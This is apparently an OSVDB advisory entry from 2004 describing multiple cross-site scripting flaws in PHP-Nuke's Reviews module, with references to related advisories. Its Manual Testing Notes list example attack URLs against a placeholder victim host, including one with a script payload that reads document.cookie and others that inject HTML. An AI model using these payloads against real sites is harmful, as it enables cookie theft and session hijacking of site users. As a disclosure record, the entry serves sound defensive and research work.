PHP-Nuke Reviews Module Multiple Variable XSS

2004-05-14T10:09:03
ID OSVDB:6999
Type osvdb
Reporter DarkBicho(darkbicho@gmail.com), Janek Vind "waraxe"(come2waraxe@yahoo.com)
Modified 2004-05-14T10:09:03

Description

Vulnerability Description

PHP-Nuke contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate url, cover, rlanguage, hits, reviewer, text, id, title and uname variables upon submission to the Reviews module. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

PHP-Nuke contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate url, cover, rlanguage, hits, reviewer, text, id, title and uname variables upon submission to the Reviews module. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

http://[victim]/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f003bar.org&reviewer=f00bar&url_title=foobar&url=[XSS CODE]

http://[victim]/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f003bar.org&reviewer=f00bar&cover=[XSS CODE]

http://[victim]/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f00bar.org&reviewer=f00bar&rlanguage=[XSS CODE]

http://[victim]/nuke73/modules.php?name=Reviews&rop=preview_review&title=f001&text=f002&score=9&email=f00bar.org&reviewer=f00bar&hits=[XSS CODE]

http://[victim]/nuke73/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=f00bar.org&reviewer=[XSS CODE]

http://[victim]/nuke72/modules.php?name=Reviews&rop=Yes&title=f001&text=f002&score=9&email=f00bar.org&text=f00%253c/ textarea>%253cscript>alert%2528document.cookie);%253c/script>bar

http://[victim]/nuke73/modules.php?name=Reviews&rop=savecomment&uname=[XSS CODE]&id=8&score=9

http://[victim]/nuke1/modules.php?name=Reviews&rop=postcomment&id='<h1>DarkBicho</h1>&title=a

http://[victim]/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=<h1>DarkBicho</h1>

References:

Secunia Advisory ID:11852 Related OSVDB ID: 7001 Related OSVDB ID: 7000 Related OSVDB ID: 6997 Related OSVDB ID: 6998 Related OSVDB ID: 7002 Related OSVDB ID: 7003 Other Advisory URL: http://bichosoft.webcindario.com/advisory-05.txt Other Advisory URL: http://www.waraxe.us/index.php?modname=sa&id=32 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-06/0310.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-06/0095.html CVE-2004-2294 Bugtraq ID: 10524